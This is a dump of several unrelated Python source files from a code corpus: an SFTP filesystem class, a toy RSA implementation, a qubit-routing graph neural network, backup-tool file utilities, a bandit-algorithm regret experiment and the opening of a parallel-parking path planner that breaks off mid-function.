text stringlengths 957 885k |
|---|
import errno
import logging
import stat
from pathlib import PurePosixPath
from types import TracebackType
from typing import Any, cast, Generator, Iterable, Optional
import paramiko
from cerulean.file_system import FileSystem
from cerulean.file_system_impl import FileSystemImpl
from cerulean.path import AbstractPath, EntryType, Path, Permission
from cerulean.ssh_terminal import SshTerminal
from cerulean.util import BaseExceptionType
logger = logging.getLogger(__name__)
class SftpFileSystem(FileSystemImpl):
"""A FileSystem implementation that connects to an SFTP server.
SftpFileSystem supports the / operation:
.. code-block:: python
fs / 'path'
which produces a :class:`Path`, through which you can do things \
with the remote files.
It is also a context manager, so that you can (and should!) use it \
with a ``with`` statement, which will ensure that the connection \
is closed when you are done with the it. Alternatively, you can \
call :meth:`close` to close the connection.
If `own_term` is True, this class assumes that it owns the terminal \
you gave it, and that it is responsible for closing it when it's \
done with it. If you share an SshTerminal between an SftpFileSystem \
and a scheduler, or use the terminal directly yourself, then you \
want to use False here, and close the terminal yourself when you \
don't need it any more.
Args:
terminal: The terminal to connect through.
own_term: Whether to close the terminal when the file system \
is closed.
"""
def __init__(self, terminal: SshTerminal, own_term: bool = False) -> None:
self.__terminal = terminal
self.__own_term = own_term
self.__ensure_sftp(True)
self.__sftp2 = None # type: Optional[paramiko.SFTPClient]
self.__max_tries = 3
def __enter__(self) -> 'SftpFileSystem':
"""Enter context manager."""
return self
def __exit__(self, exc_type: Optional[BaseExceptionType],
exc_value: Optional[BaseException],
traceback: Optional[TracebackType]) -> None:
"""Exit context manager."""
if self.__own_term:
self.close()
def close(self) -> None:
self.__sftp.close()
logger.info('Disconnected from SFTP server')
def __eq__(self, other: Any) -> bool:
if not isinstance(other, FileSystem):
return NotImplemented
if isinstance(other, SftpFileSystem):
return self.__terminal == other.__terminal
return False
def root(self) -> Path:
return Path(self, PurePosixPath('/'))
def __truediv__(self, segment: str) -> Path:
return Path(self, PurePosixPath('/' + segment.strip('/')))
def _supports(self, feature: str) -> bool:
if feature not in self._features:
raise ValueError('Invalid argument for "feature"')
return True
def _exists(self, path: AbstractPath) -> bool:
self.__ensure_sftp()
lpath = cast(PurePosixPath, path)
try:
self.__sftp.stat(str(lpath))
return True
except IOError:
return False
def _mkdir(
self, path: AbstractPath, mode: Optional[int] = None,
parents: bool = False, exists_ok: bool = False) -> None:
self.__ensure_sftp()
lpath = cast(PurePosixPath, path)
if parents:
for parent in reversed(lpath.parents):
if not self._exists(parent):
self.__sftp.mkdir(str(parent))
if self._exists(lpath):
if not exists_ok:
raise FileExistsError(
'File {} exists and exists_ok was False'.format(lpath))
else:
return
if mode is not None:
self.__sftp.mkdir(str(lpath), mode)
else:
self.__sftp.mkdir(str(lpath))
def _iterdir(
self, path: AbstractPath) -> Generator[PurePosixPath, None, None]:
self.__ensure_sftp()
lpath = cast(PurePosixPath, path)
# Note: we're not using listdir_iter here, because it hangs:
# https://github.com/paramiko/paramiko/issues/1171
try:
for entry in self.__sftp.listdir(str(lpath)):
yield lpath / entry
except OSError as e:
# Paramiko omits the filename, which breaks Path.walk()
# so add it back in here.
raise OSError(e.errno, e.strerror, str(lpath))
def _rmdir(self, path: AbstractPath, recursive: bool = False) -> None:
self.__ensure_sftp()
lpath = cast(PurePosixPath, path)
if not self._exists(lpath):
return
if not self._is_dir(lpath):
raise RuntimeError("Path must refer to a directory")
if recursive:
for entry in self.__sftp.listdir_attr(str(lpath)):
entry_path = lpath / entry.filename
if self._is_symlink(entry_path):
self.__sftp.unlink(str(entry_path))
elif self._is_dir(entry_path):
self._rmdir(entry_path, True)
else:
self.__sftp.unlink(str(entry_path))
self.__sftp.rmdir(str(lpath))
def _touch(self, path: AbstractPath) -> None:
self.__ensure_sftp()
lpath = cast(PurePosixPath, path)
with self.__sftp.file(str(lpath), 'a'):
pass
def _streaming_read(
self, path: AbstractPath) -> Generator[bytes, None, None]:
# Buffer size vs. speed (MB/s) against localhost
# up down local
# 8k 33 56 159
# 16k 52 56 145
# 24k 66 57 150
# 32k 24 57 149
# 2M 24 48
# scp 120 110
# cp 172
def ensure_sftp2(self: 'SftpFileSystem') -> None:
if self.__sftp2 is None:
self.__sftp2 = self.__terminal._get_downstream_sftp_client()
else:
try:
self.__sftp2.lstat('/')
except OSError as e:
if 'Socket is closed' in str(e):
self.__sftp2 = self.__terminal._get_downstream_sftp_client()
else:
raise
channel = self.__sftp2.get_channel()
if not (channel and channel.get_transport().is_active()):
self.__sftp2 = self.__terminal._get_downstream_sftp_client()
lpath = cast(PurePosixPath, path)
ensure_sftp2(self)
try:
size = self._size(path)
with self.__sftp2.file(str(lpath), 'rb') as f: # type: ignore
f.prefetch(size)
data = f.read(24576)
while len(data) > 0:
yield data
data = f.read(24576)
except paramiko.SSHException as e:
if 'Server connection dropped' in str(e):
raise ConnectionError(e)
else:
raise e
def _streaming_write(
self, path: AbstractPath, data: Iterable[bytes]) -> None:
self.__ensure_sftp()
lpath = cast(PurePosixPath, path)
try:
with self.__sftp.file(str(lpath), 'wb') as f:
f.set_pipelined(True)
for chunk in data:
f.write(chunk)
except paramiko.SSHException as e:
if 'Server connection dropped' in str(e):
raise ConnectionError(e)
else:
raise e
def _rename(self, path: AbstractPath, target: AbstractPath) -> None:
self.__ensure_sftp()
lpath = cast(PurePosixPath, path)
ltarget = cast(PurePosixPath, target)
self.__sftp.posix_rename(str(lpath), str(ltarget))
def _unlink(self, path: AbstractPath) -> None:
self.__ensure_sftp()
lpath = cast(PurePosixPath, path)
self.__sftp.unlink(str(lpath))
def _is_dir(self, path: AbstractPath) -> bool:
self.__ensure_sftp()
lpath = cast(PurePosixPath, path)
try:
mode = self.__stat(lpath).st_mode
return mode is not None and bool(stat.S_ISDIR(mode))
except FileNotFoundError:
return False
def _is_file(self, path: AbstractPath) -> bool:
self.__ensure_sftp()
lpath = cast(PurePosixPath, path)
try:
mode = self.__stat(lpath).st_mode
return mode is not None and bool(stat.S_ISREG(mode))
except FileNotFoundError:
return False
def _is_symlink(self, path: AbstractPath) -> bool:
self.__ensure_sftp()
lpath = cast(PurePosixPath, path)
try:
mode = self.__lstat(lpath).st_mode
return mode is not None and bool(stat.S_ISLNK(mode))
except FileNotFoundError:
return False
def _entry_type(self, path: AbstractPath) -> EntryType:
self.__ensure_sftp()
lpath = cast(PurePosixPath, path)
mode_to_type = [(stat.S_ISDIR, EntryType.DIRECTORY),
(stat.S_ISREG, EntryType.FILE),
(stat.S_ISLNK, EntryType.SYMBOLIC_LINK),
(stat.S_ISCHR, EntryType.CHARACTER_DEVICE),
(stat.S_ISBLK, EntryType.BLOCK_DEVICE),
(stat.S_ISFIFO, EntryType.FIFO),
(stat.S_ISSOCK, EntryType.SOCKET)]
try:
mode = self.__lstat(lpath).st_mode
except IOError:
raise OSError(errno.ENOENT, 'No such file or directory',
str(lpath))
for predicate, result in mode_to_type:
if mode is not None and predicate(mode):
return result
raise RuntimeError('Object is of unknown type, please report a'
'Cerulean bug')
def _size(self, path: AbstractPath) -> int:
self.__ensure_sftp()
lpath = cast(PurePosixPath, path)
size = self.__stat(lpath).st_size
if size is None:
raise RuntimeError('Server did not return size')
return size
def _uid(self, path: AbstractPath) -> int:
self.__ensure_sftp()
lpath = cast(PurePosixPath, path)
uid = self.__stat(lpath).st_uid
if uid is None:
raise RuntimeError('Server did not return a UID')
return uid
def _gid(self, path: AbstractPath) -> int:
self.__ensure_sftp()
lpath = cast(PurePosixPath, path)
gid = self.__stat(lpath).st_gid
if gid is None:
raise RuntimeError('Server did not return a GID')
return gid
def _has_permission(
self, path: AbstractPath, permission: Permission) -> bool:
self.__ensure_sftp()
lpath = cast(PurePosixPath, path)
mode = self.__stat(lpath).st_mode
if mode is None:
raise RuntimeError('Server did not return file mode')
return bool(mode & permission.value)
def _set_permission(
self, path: AbstractPath, permission: Permission,
value: bool = True) -> None:
self.__ensure_sftp()
lpath = cast(PurePosixPath, path)
mode = self.__stat(lpath).st_mode
if mode is None:
raise RuntimeError('Server did not return file mode')
if value:
mode = mode | permission.value
else:
mode = mode & ~permission.value
self._chmod(lpath, mode)
def _chmod(self, path: AbstractPath, mode: int) -> None:
self.__ensure_sftp()
lpath = cast(PurePosixPath, path)
self.__sftp.chmod(str(lpath), mode)
def _symlink_to(self, path: AbstractPath, target: AbstractPath) -> None:
self.__ensure_sftp()
lpath = cast(PurePosixPath, path)
ltarget = cast(PurePosixPath, target)
self.__sftp.symlink(str(ltarget), str(lpath))
def _readlink(self, path: AbstractPath, recursive: bool) -> Path:
self.__ensure_sftp()
lpath = cast(PurePosixPath, path)
if recursive:
# SFTP's normalize() raises if there's a link loop or a \
# non-existing target, which we don't want, so we use \
# our own algorithm.
max_iter = 32
cur_path = lpath
iter_count = 0
while self._is_symlink(cur_path) and iter_count < max_iter:
target_str = self.__sftp.readlink(str(cur_path))
if target_str is None:
raise RuntimeError('Server error while reading link')
target = PurePosixPath(target_str)
if not target.is_absolute():
target = cur_path.parent / target
cur_path = target
iter_count += 1
if iter_count == max_iter:
raise RuntimeError('Too many symbolic links detected')
target = PurePosixPath(self.__sftp.normalize(str(path)))
else:
target_str = self.__sftp.readlink(str(path))
if target_str is None:
raise RuntimeError('Server error while reading link')
target = PurePosixPath(target_str)
if not target.is_absolute():
target = lpath.parent / target
return Path(self, target)
def __lstat(self, path: PurePosixPath) -> paramiko.SFTPAttributes:
return self.__sftp.lstat(str(path))
def __stat(self, path: PurePosixPath) -> paramiko.SFTPAttributes:
return self.__sftp.stat(str(path))
def __ensure_sftp(self, first: bool = False) -> None:
if first:
logger.info('Connecting to SFTP server')
self.__sftp = self.__terminal._get_sftp_client()
logger.info('Connected to SFTP server')
else:
try:
self.__sftp.lstat('/')
except OSError as e:
if 'Socket is closed' in str(e):
logger.info('Reconnecting to SFTP server')
self.__sftp = self.__terminal._get_sftp_client()
logger.info('Connected to SFTP server')
else:
raise
channel = self.__sftp.get_channel()
if not (channel and channel.get_transport().is_active()):
logger.info('Reconnecting to SFTP server')
self.__sftp = self.__terminal._get_sftp_client()
logger.info('Connected to SFTP server')
|
<filename>crypto/algorithms/purersa.py<gh_stars>1-10
__author__ = 'bsoer'
from crypto.algorithms.algorithminterface import AlgorithmInterface
from tools.argparcer import ArgParcer
import tools.rsatools as RSATools
import math
import sys
class PureRSA(AlgorithmInterface):
n = None
totient = None
e = None
d = None
publicKey = None
privateKey = None
other_publicKey = None
other_e = 0
other_n = 0
def __init__(self, arguments):
prime1 = ArgParcer.getValue(arguments, "-p1")
prime2 = ArgParcer.getValue(arguments, "-p2")
if prime1 == "" or prime2 == "":
raise AttributeError("Two Prime Number Parameters -p1 and -p2 are required to use PureRSA Encryption")
else:
intPrime1 = int(prime1)
intPrime2 = int(prime2)
# calculate all components
self.n = intPrime1 * intPrime2
self.totient = (intPrime1 - 1)*(intPrime2-1)
if intPrime1 > intPrime2:
self.e = RSATools.findCoPrimeToTotient(self.totient, intPrime1)
else:
self.e = RSATools.findCoPrimeToTotient(self.totient, intPrime2)
self.d = RSATools.findDFromTotientAndE(self.totient, self.e)
# e and n make our public key
# were going to arbitrarily format our public key
# <eLength>:<eValue><nValue>
strE = str(self.e)
strELen = len(strE)
self.publicKey = str(strELen) + ":" + strE + str(self.n)
# d and n make our private key
strD = str(self.d)
strDLen = len(strD)
self.privateKey = str(strDLen) + ":" + strD + str(self.n)
def sendFirstMessage(self):
return self.publicKey.encode()
def receiveFirstMessage(self, firstMessage):
self.other_publicKey = firstMessage.decode()
colonIndex = self.other_publicKey.index(':')
strELen = self.other_publicKey[0:colonIndex]
eLen = int(strELen)
strE = self.other_publicKey[colonIndex+1:colonIndex + 1 + eLen]
self.other_e = int(strE)
strN = self.other_publicKey[colonIndex+1+eLen:]
self.other_n = int(strN)
self.logger.debug("Received Public Key Values: N " + str(self.other_n) + ", E " + str(self.other_e))
return False # return true for debug to display public key
def encryptString(self, unencryptedMessage):
plaintext_message_seg_length = int(math.floor(math.log(float(self.other_n), 2)))
encrypted_message_seg_length = int(math.ceil(math.log(float(self.other_n), 2)))
self.logger.debug("Based On Key Parameters, the maximum message lengths are as follows: Plaintext: "
+ str(plaintext_message_seg_length) + " Ciphertext: " + str(encrypted_message_seg_length))
# convert the message to all binary bits - padd out to make sure they all are 8 bits long for the character
binaryUnencryptedMessage = ''.join(format(ord(x), '08b') for x in unencryptedMessage)
self.logger.debug(binaryUnencryptedMessage)
# post pad the string to get an even number
while len(binaryUnencryptedMessage) % plaintext_message_seg_length != 0:
binaryUnencryptedMessage += '0'
self.logger.debug(binaryUnencryptedMessage)
# split it up into segments of plaintext_message_seg_length
unencryptedMessageSegments = list()
for i in range(0, len(binaryUnencryptedMessage), plaintext_message_seg_length):
unencryptedMessageSegments.append(binaryUnencryptedMessage[i: i + plaintext_message_seg_length])
self.logger.debug(unencryptedMessageSegments)
# encrypt each segment using RSA
encryptedMessageSegments = list()
for i in unencryptedMessageSegments:
segmentInt = int(i, 2) # converts string to int, interpreting it as in base 2
encryptedSegmentInt = (segmentInt ** self.other_e) % self.other_n
encryptedSegmentBinary = format(encryptedSegmentInt, '0' + str(encrypted_message_seg_length) + 'b')
encryptedMessageSegments.append(encryptedSegmentBinary)
self.logger.debug(encryptedMessageSegments)
encryptedMessageBinaryString = ''.join(encryptedMessageSegments)
self.logger.debug(encryptedMessageBinaryString)
encryptedMessageInt = int(encryptedMessageBinaryString, 2)
self.logger.debug(encryptedMessageInt)
self.logger.debug(bin(encryptedMessageInt))
encryptedMessage = encryptedMessageInt.to_bytes(byteorder=sys.byteorder,
length=math.ceil(len(encryptedMessageBinaryString) / 8))
return encryptedMessage
def decryptString(self, encryptedMessage):
plaintext_message_seg_length = int(math.floor(math.log(self.n, 2)))
encrypted_message_seg_length = int(math.ceil(math.log(self.n, 2)))
self.logger.debug("Based On Key Parameters, the maximum message lengths are as follows: Plaintext: "
+ str(plaintext_message_seg_length) + " Ciphertext: " + str(encrypted_message_seg_length))
number = int.from_bytes(encryptedMessage, byteorder=sys.byteorder, signed=False)
self.logger.debug(number)
binaryEncryptedMessage = str(bin(number))[2:]
self.logger.debug(binaryEncryptedMessage)
while len(binaryEncryptedMessage) % encrypted_message_seg_length != 0:
binaryEncryptedMessage = '0' + binaryEncryptedMessage
encryptedMessageSegments = list()
for i in range(0, len(binaryEncryptedMessage), encrypted_message_seg_length):
encryptedMessageSegments.append(binaryEncryptedMessage[i: i + encrypted_message_seg_length])
self.logger.debug(encryptedMessageSegments)
unencryptedSegments = list()
for i in encryptedMessageSegments:
segmentInt = int(i, 2) # converts string to int, interpreting it as in base 2
unencryptedSegmentInt = int((segmentInt ** self.d) % self.n)
unencryptedSegmentBinary = format(unencryptedSegmentInt, '0' + str(plaintext_message_seg_length) + 'b')
unencryptedSegments.append(unencryptedSegmentBinary)
self.logger.debug(unencryptedSegments)
joinedSegments = ''.join(unencryptedSegments)
self.logger.debug(joinedSegments)
letters = list()
for i in range(0, len(joinedSegments), 8):
letters.append(joinedSegments[i: i + 8])
self.logger.debug(letters)
plainMessage = ""
for letter in letters:
letterInt = int(letter, 2)
character = chr(letterInt)
plainMessage += character
return plainMessage
|
<filename>qroute/models/graph_dual.py
import typing
import numpy as np
import torch
import torch_geometric
from ..environment.device import DeviceTopology
from ..environment.state import CircuitStateDQN
class NormActivation(torch.nn.Module):
def __init__(self, dim=-1):
super().__init__()
self.dim = dim
def forward(self, tensor):
tensor = tensor ** 2
length = tensor.sum(dim=self.dim, keepdim=True)
return tensor / length
class GraphDualModel(torch.nn.Module):
def __init__(self, device: DeviceTopology, stop_move: bool = False):
"""
Create the decision model for the given device topology
:param device: the device object on which the agent should propose actions
"""
super(GraphDualModel, self).__init__()
self.device = device
mlp = torch.nn.Sequential(
torch.nn.Linear(len(self.device) * 2, 50),
torch.nn.SiLU(),
torch.nn.Linear(50, 10),
torch.nn.SiLU(),
torch.nn.Linear(10, 4),
torch.nn.SiLU(),
)
self.edge_conv = torch_geometric.nn.EdgeConv(aggr='add', nn=mlp)
self.edges = torch.tensor(self.device.edges).transpose(1, 0)
self.value_head = torch.nn.Sequential(
torch.nn.Linear(len(self.device) * 4 + len(self.device) + len(self.device.edges), 64),
torch.nn.SiLU(),
torch.nn.Linear(64, 16),
torch.nn.SiLU(),
torch.nn.Linear(16, 1),
)
self.policy_head = torch.nn.Sequential(
torch.nn.Linear(len(self.device) * 4 + len(self.device.edges),
len(self.device.edges) + (1 if stop_move else 0)),
NormActivation(dim=-1),
)
self.optimizer = torch.optim.Adam(self.parameters())
def forward(self, state: CircuitStateDQN) -> typing.Tuple[int, np.ndarray]:
"""
The callable for the model, does the forward propagation step
:param state: input state of the circuit
:return: the probability of each of the actions and value function for state
"""
x, remaining, locks = self.get_representation(state)
x = self.edge_conv(x, self.edges)
x = x.view(-1)
value_input = torch.cat([x, remaining, locks])
policy_input = torch.cat([x, locks])
policy = self.policy_head(policy_input)
value: int = self.value_head(value_input)
# policy[-1] = -1e10 FIXME: Force this constraint for all other functions
return value, policy
def get_representation(self, state: CircuitStateDQN):
"""
Obtains the state representation
:param state: the state of the circuit right now
"""
nodes_to_target_nodes = state.target_nodes
interaction_map = torch.zeros((len(self.device), len(self.device)))
for idx, target in enumerate(nodes_to_target_nodes):
if target == -1:
continue
interaction_map[idx, target] = 1
remaining_targets = torch.from_numpy(state.remaining_targets)
mutex_locks = torch.from_numpy(state.locked_edges)
return interaction_map, remaining_targets, mutex_locks
@staticmethod
def _loss_p(predicted, target):
loss = torch.sum(-target * ((1e-8 + predicted).log()))
return loss
@staticmethod
def _loss_v(predicted, target):
criterion = torch.nn.MSELoss()
loss = criterion(predicted, target)
return loss
def fit(self, state, v, p):
self.optimizer.zero_grad()
self.train()
v = v.reshape(1)
pred_v, pred_p = self(state)
v_loss = self._loss_v(pred_v, v)
p_loss = self._loss_p(pred_p, p)
loss = v_loss + p_loss
loss.backward()
self.optimizer.step()
return v_loss.item(), p_loss.item()
|
<reponame>jhnphm/boar<gh_stars>0
# -*- coding: utf-8 -*-
# Copyright 2011 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import with_statement
import os, re
from common import *
from treecomp import TreeComparer
def safe_delete_file(path):
"""This function behaves like os.remove(), except for filenames
that looks like they may be part of vital session data. If such a
filename is given as argument, an AssertionError will be raised
and the file will not be deleted."""
path = os.path.normcase(path)
filename = os.path.basename(path)
assert not is_md5sum(filename), "safe_delete prevented deletion of blob"
assert not is_recipe_filename(filename), "safe_delete prevented deletion of recipe"
assert filename not in ("bloblist.json", "session.json", "session.md5"), "safe_delete prevented deletion of session data"
assert not filename.endswith(".fingerprint"), "safe_delete prevented deletion of session fingerprint"
os.remove(path)
def safe_delete_recipe(path):
path = os.path.normcase(path)
filename = os.path.basename(path)
assert is_recipe_filename(filename), "safe_delete_recipe can only delete recipes"
os.remove(path)
def safe_delete_blob(path):
path = os.path.normcase(path)
filename = os.path.basename(path)
assert is_md5sum(filename), "safe_delete_recipe can only delete blobs"
os.remove(path)
def unsafe_delete(path):
os.remove(path)
def bloblist_to_dict(bloblist):
"""Returns the bloblist as a dict on the form filename ->
blobinfo."""
blobdict = {}
for b in bloblist:
blobdict[b['filename']] = b
assert len(blobdict) == len(bloblist), "Duplicate filename in bloblist"
return blobdict
def treecompare_bloblists(from_bloblist, to_bloblist):
"""Constructs and returns a TreeComparer instance using the
filenames and md5sums found in the given bloblist entries."""
def bloblist_to_dict(bloblist):
cmpdict = {}
for b in bloblist:
cmpdict[b['filename']] = b['md5sum']
assert len(cmpdict) == len(bloblist), "Duplicate filename in bloblist"
return cmpdict
from_dict = bloblist_to_dict(from_bloblist)
to_dict = bloblist_to_dict(to_bloblist)
return TreeComparer(from_dict, to_dict)
def bloblist_delta(from_bloblist, to_bloblist):
""" Calculate a delta bloblist given two complete bloblists."""
tc = treecompare_bloblists(from_bloblist, to_bloblist)
to_dict = bloblist_to_dict(to_bloblist)
delta = []
for fn in tc.all_changed_filenames():
if tc.is_deleted(fn):
delta.append({"action": "remove", "filename": fn})
else:
delta.append(to_dict[fn])
return delta
def apply_delta(bloblist, delta):
""" Apply a delta bloblist to a original bloblist, yielding a
resulting bloblist."""
for b in bloblist:
assert "action" not in b
for d in delta:
assert d.get("action", None) in (None, "remove")
fns_to_delete = set([b['filename']
for b in delta
if b.get("action", None) == "remove"])
new_and_modified_dict = bloblist_to_dict([b
for b in delta
if "action" not in b])
result = []
for b in bloblist:
if b['filename'] in fns_to_delete:
continue
elif b['filename'] in new_and_modified_dict:
result.append(new_and_modified_dict[b['filename']])
del new_and_modified_dict[b['filename']]
else:
result.append(b)
result += new_and_modified_dict.values()
return result
def invert_bloblist(bloblist):
""" Returns a dictionary on the form md5sum -> [blobinfo,
blobinfo, ...] """
result = {}
for bi in bloblist:
if bi['md5sum'] not in result:
result[bi['md5sum']] = []
result[bi['md5sum']].append(bi)
return result
def sorted_bloblist(bloblist):
def info_comp(x, y):
return cmp(x['filename'], y['filename'])
return sorted(bloblist, info_comp)
def parse_manifest_name(path):
"""Returns a tuple (lowercase hash name, hash). Both are None if
the path is not a valid manifest filename."""
m = re.match("(^|.*/)(manifest-([a-z0-9]+).txt|manifest-([a-z0-9]{32})\.md5|(manifest.md5))", path, flags=re.IGNORECASE)
if not m:
return None, None
if m.group(5):
return "md5", None
if m.group(3):
hashname = m.group(3).lower()
return hashname, None
hashname = "md5"
manifest_hash = m.group(4).lower()
return hashname, manifest_hash
assert parse_manifest_name("/tmp/manifest.md5") == ("md5", None)
assert parse_manifest_name("/tmp/manifest-d41d8cd98f00b204e9800998ecf8427e.md5") == ("md5", "d41d8cd98f00b204e9800998ecf8427e")
assert parse_manifest_name("/tmp/manifest-md5.txt") == ("md5", None)
assert parse_manifest_name("/tmp/manifest-sha256.txt") == ("sha256", None)
assert parse_manifest_name("/tmp/tjohej.txt") == (None, None)
assert parse_manifest_name("/tmp/tjohej.md5") == (None, None)
def is_recipe_filename(filename):
filename_parts = filename.split(".")
return len(filename_parts) == 2 \
and filename_parts[1] == "recipe" \
and is_md5sum(filename_parts[0])
class SimpleProgressPrinter:
def __init__(self, output, label = "Processing"):
self.last_t = 0
self.start_t = time.time()
self.active = False
self.last_string = ""
self.label = printable(label); del label
self.symbols = list('-\\|/')
self.output = output
self.updatecounter = 0
if os.getenv("BOAR_HIDE_PROGRESS") == "1":
# Only print the label, do nothing else.
self.output.write(self.label)
self.output.write("\n")
self.output = FakeFile()
def _say(self, s):
# self.output will point to /dev/null if quiet
self.output.write(s)
self.output.flush()
def update(self, f):
self.active = True
self.updatecounter += 1
now = time.time()
symbol = self.symbols.pop(0)
self.symbols.append(symbol)
eraser = (" " * len(self.last_string)) + "\r"
self.last_string = self.label + ": %s%% [%s]" % (round(100.0 * f, 1), symbol)
self._say(eraser + self.last_string + "\r")
#print self.last_string
self.last_t = now
def finished(self):
if self.active:
self._say(self.last_string[:-3] + " " + "\n")
|
<reponame>marcosherreroa/Aplicaciones-de-los-algoritmos-bandidos
# -*- coding: utf-8 -*-
"""""
Bandidos estocásticos: introducción, algoritmos y experimentos
TFG Informática
Sección 7.2.9
Figura 14
Autor: <NAME>
"""
import math
import random
import scipy.stats as stats
import matplotlib.pyplot as plt
import numpy as np
def computemExpl(n):
return math.ceil(n**(2/3))
def computemTeor (n,Delta):
if Delta == 0:
return 0
else :
return max(1,math.ceil(4/(Delta*Delta)*math.log(n*Delta*Delta/4)))
def computemOpt(n,Delta):
expectedRegret = np.empty(n//2+1)
X = stats.norm(0,1)
expectedRegret[0] = 0.5*n*Delta
for m in range(1,n//2+1):
expectedRegret[m] = m*Delta+(n-m)*Delta*X.cdf(-m*Delta/math.sqrt(2*m))
mOpt = min(range(n//2+1),key = lambda i: expectedRegret[i])
return mOpt
def samplePseudoRegretEF(n,k,m,arms,gaps):
rwds = k*[0]
for i in range(m):
for j in range(k):
rwds[j] += arms[j].rvs()
maximum = max(rwds)
bestarm = random.choice([i for i in range(k) if rwds[i] == maximum])
return m*sum(gaps)+(n-m*k)*gaps[bestarm]
n = 1000
sampleNum = 1000
arms = 2*[None]
arms[0] = stats.norm(0,1)
gaps = 2*[0]
nDeltas = 40
Deltas = np.linspace(0,1,nDeltas)
regretmExpl = np.zeros(nDeltas)
regretmTeor = np.zeros(nDeltas)
regretmOpt = np.zeros(nDeltas)
C_EP2Min = np.empty(nDeltas)
C_EP3Min = np.empty(nDeltas)
mExpl = computemExpl(n)
mExpl = nDeltas*[mExpl]
mTeor = nDeltas*[0]
mOpt = nDeltas*[0]
for i in range(nDeltas):
Delta = Deltas[i]
arms[1]= stats.norm(-Delta,1)
gaps[1] = Delta
mTeor[i] = computemTeor(n,Delta)
mOpt[i] = computemOpt(n,Delta)
for k in range(sampleNum):
regretmExpl[i] += samplePseudoRegretEF(n,2,mExpl[i],arms,gaps)
regretmTeor[i] += samplePseudoRegretEF(n,2,mTeor[i],arms,gaps)
regretmOpt[i] += samplePseudoRegretEF(n,2,mOpt[i],arms,gaps)
regretmExpl[i] /= sampleNum
regretmTeor[i] /= sampleNum
regretmOpt[i] /= sampleNum
if Delta == 0:
C_EP2Min[i] = 0
else:
C_EP2Min[i] = min(n*Delta,Delta+4/Delta*(1+max(0,math.log(n*Delta*Delta/4))))
C_EP3Min[i] = (Delta+math.sqrt(2)*math.exp(-1/2))*math.ceil(n**(2/3))
fig = plt.figure()
plt.plot(Deltas,regretmExpl,color='tab:red',label='EP (m=m_Expl)')
plt.plot(Deltas,regretmTeor, color='tab:green',label = 'EP (m = m_Teor)')
plt.plot(Deltas,regretmOpt, color='tab:blue', label = 'EP (m = m_Opt)')
plt.plot(Deltas,C_EP2Min,'--', color='tab:green',label= 'C_EP2_min')
plt.plot(Deltas,C_EP3Min,'--',color='tab:red',label='C_EP3_min')
plt.xlabel('∆')
plt.ylabel('Remordimiento esperado')
plt.ylim(0,80)
plt.legend(loc='upper right')
fig.savefig('EFExpDeltaRegret.pdf',format='pdf')
plt.show()
fig = plt.figure()
plt.plot(Deltas, mExpl, color='tab:red', label = 'm_Expl')
plt.plot(Deltas, mTeor, color='tab:green', label = 'm_Teor')
plt.plot(Deltas,mOpt, color = 'tab:blue', label = 'm_Opt')
plt.xlabel('∆')
plt.ylabel('m')
plt.legend(loc='upper right')
fig.savefig('ms.pdf',format='pdf')
plt.show()
|
<reponame>ztq1521367/APA
import numpy as np
import matplotlib.pyplot as plt
from scipy import linalg
import math
import time
from threading import Thread
import pdb
import random
import copy
import re
"""
输入:车位宽度,车辆起始点,最小停车位宽度,车距离车位的最短距离和最长距离(这个可以根据具体车型事先计算好)
输出:计算避障点坐标,终止点坐标,以及每个控制点的航向角,避障点可以有多个:驶离车位时右前角,驶出车位时右后角;
根据控制点的约束条件,解线性方程组,得到多项式系数,拟合曲线,确认各个控制点对应的坐标是否满足约束要求,曲线曲率是否满足要求。
如果不满足,采用多段路径进行规划,
最后规划出符合要求的路径。
"""
#水平泊车
#参数系数 单位:米
safeDistance = 0.2 #安全距离
minParkLen = 6.6 #最小停车位宽度
minDiffWidth = 1 #车距离车位最小距离
carWidth = 1.85 #车宽
carLen = 4.85 #车高
rearLen = 1.0 #后悬
frontLen = 1.0 #前悬
axialLen = 1.5 #轴长
axialDistance = 2.8 #轴距
maxWheelAngle = 40 #最大车轮转角
zPointX = 2.9 #避障点x坐标
zPointY = -0.91 #避障点y坐标
zAngle = 30 #避障点的航向角
carSize = [4.8, 1.8]
rrp = [-rearLen, -carSize[1]/2]
lrp = [-rearLen, carSize[1]/2]
lfp = [axialDistance+frontLen, carSize[1]/2]
rfp = [axialDistance+frontLen, -carSize[1]/2]
stopFlag = False
hxAngle = 0
raxPoint = [0,0]
class car:
"""
车辆信息
"""
def __init__(self, carWidth, carLen, frontLen, rearLen, axialLen, axialDistance, maxWheelAngle):
self.width = carWidth #车宽
self.height = carLen #车宽
self.frontLen = frontLen #前悬
self.rearLen = rearLen #后悬
self.axialLen = axialLen #轴长
self.axialDistance = axialDistance #轴距
self.maxWheelAngle = maxWheelAngle #车轮最大转角
class contrlPoint:
"""
控制点信息
"""
def __init__(self, startX, startY, startAngle, barrierX, barrierY, barrierAngle, endX, endY, endAngle):
self.startX = startX
self.startY = startY
self.startAngle = startAngle
self.barrierX = barrierX
self.barrierY = barrierY
self.barrierAngle = barrierAngle
self.endX = endX
self.endY = endY
self.endAngle = endAngle
def calAvoidBarrierPoint(parkL, parkW, carInfo):
"""
计算避障点坐标以及此时的航向角
parkW:车位长
parkH:车位宽
carInfo:车辆参数信息,如:长宽、轴距、轴长等
"""
# TODO:
barrierX = 2.9
barrierY = -1.
barrierAngle = 0.43633 #0.523333 #0.35
return barrierX, barrierY, barrierAngle
def calContrlPoint(params): #parkL, parkW, startX, startY, startAngle):
"""
计算输出的起始点坐标,避障点坐标,终止点坐标
parkL:车位长
parkW:车位宽
startX:起始点x坐标
startY:起始点y坐标
startAngle:起始点航向角
"""
ctrlPoint = {}
ctrlPoint['startX'] = params['startX']
ctrlPoint['startY'] = params['startY']
ctrlPoint['startAngle'] = params['startAngle']
ctrlPoint['barrierX'] = params['barrierX']
ctrlPoint['barrierY'] = params['barrierY']
ctrlPoint['barrierAngle'] = params['barrierAngle']
ctrlPoint['endX'] = params['endX']
ctrlPoint['endY'] = params['endY']
ctrlPoint['endAngle'] = params['endAngle']
return ctrlPoint
def solve(ctrlPoint, ifAvoid, ax):
"""
建立多项式模型
